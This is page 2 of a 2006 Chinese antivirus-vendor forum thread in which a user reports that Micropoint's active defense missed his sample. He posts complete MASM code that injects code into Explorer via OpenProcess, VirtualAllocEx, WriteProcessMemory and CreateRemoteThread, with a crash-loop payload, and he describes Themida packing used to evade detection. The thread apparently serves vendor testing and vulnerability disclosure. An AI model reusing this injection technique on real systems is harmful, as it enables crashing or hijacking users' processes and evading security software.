微点交流论坛
» 游客:  注册 | 登录 | 帮助

 微点交流论坛 » 微点主动防御软件 » 微点的特大漏洞  

 16  2/2  <  1  2 
作者:
标题: 微点的特大漏洞
xor
新手上路





积分 16
发帖 16
注册 2006-12-1
#11  



  Quote:
Originally posted by Legend at 2006-12-2 17:34:
xor
您的邮件已经收到;
经官方测试你发的样本在运行时自身存在bug没有成功运行,所以微点没有报警;

其实那不是bug,使我故意这麽设置的,运行后会出现themida的logo,单击一下logo程序就正式运行了,注入并创建远程线程后运行的代码会造成内存读写错误!还有一点,themida demo版加壳的程序只能运行20分钟!

我再发一个用themida加壳的给你们

代码如下:
.586
.model flat,stdcall
option casemap:none

include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
include \masm32\include\windows.inc

includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib

.data

wndname db 'Program Manager',0
wndclass db 'Progman',0

pid dword 0
hp dword 0
.code

start proc

push offset wndname
push offset wndclass
call FindWindow

push offset pid
push eax
call GetWindowThreadProcessId

push pid
push 0
push PROCESS_ALL_ACCESS
call OpenProcess
mov hp,eax

push PAGE_EXECUTE_READWRITE
push MEM_COMMIT
push len
push 0
push eax
call VirtualAllocEx
push eax

push 0
push len
push offset bug
push eax
push hp
call WriteProcessMemory

pop eax

push 0
push 0
push 0
push eax
push 0
push 0
push hp
call CreateRemoteThread

        ret

start endp


bug:
xor eax,eax
inc byte ptr [eax]
jmp bug
ret
len=$-bug

end start

[ Last edited by xor on 2006-12-2 at 18:11 ]

附件 1: 未命名.JPG (2006-12-2 18:02, 14.45 K,下载次数: 64)


※ ※ ※ 本文纯属【xor】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2006-12-2 17:51
查看资料  发送邮件  发短消息  QQ   编辑帖子
flo
注册用户





积分 168
发帖 168
注册 2006-8-17
#12  



  Quote:
Originally posted by xor at 2006-12-2 17:51:



奇怪昨天测试时还是好的~~有一个用themida加的壳的确存在bug,我马上发一个没有bug的

DEMO版本的问题?

※ ※ ※ 本文纯属【flo】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2006-12-2 17:53
查看资料  发短消息   编辑帖子
xor
新手上路





积分 16
发帖 16
注册 2006-12-1
#13  



  Quote:
Originally posted by flo at 2006-12-2 17:53:

DEMO版本的问题?

不是,当时电脑有点问题~~

※ ※ ※ 本文纯属【xor】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2006-12-2 17:59
查看资料  发送邮件  发短消息  QQ   编辑帖子
xor
新手上路





积分 16
发帖 16
注册 2006-12-1
#14  

微点的反毒工程师星期天休息吗?我昨天重新发的样本,今天怎麽没回复?(没收到邮件或消息)

※ ※ ※ 本文纯属【xor】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2006-12-3 09:21
查看资料  发送邮件  发短消息  QQ   编辑帖子
weizg
中级用户




积分 434
发帖 430
注册 2006-11-25
来自 广西南宁
#15  

关注中

※ ※ ※ 本文纯属【weizg】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2006-12-3 21:33
查看资料  发送邮件  发短消息  QQ   编辑帖子
ainibubian
新手上路




积分 23
发帖 23
注册 2006-12-8
#16  关注

关注中

※ ※ ※ 本文纯属【ainibubian】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2006-12-8 23:38
查看资料  发送邮件  发短消息  QQ   编辑帖子
 16  2/2  <  1  2 



论坛跳转:

可打印版本 | 推荐 | 订阅 | 收藏


[ 联系我们 - 东方微点 ]

北京东方微点信息技术有限责任公司 福建东方微点信息安全有限责任公司

闽ICP备05030815号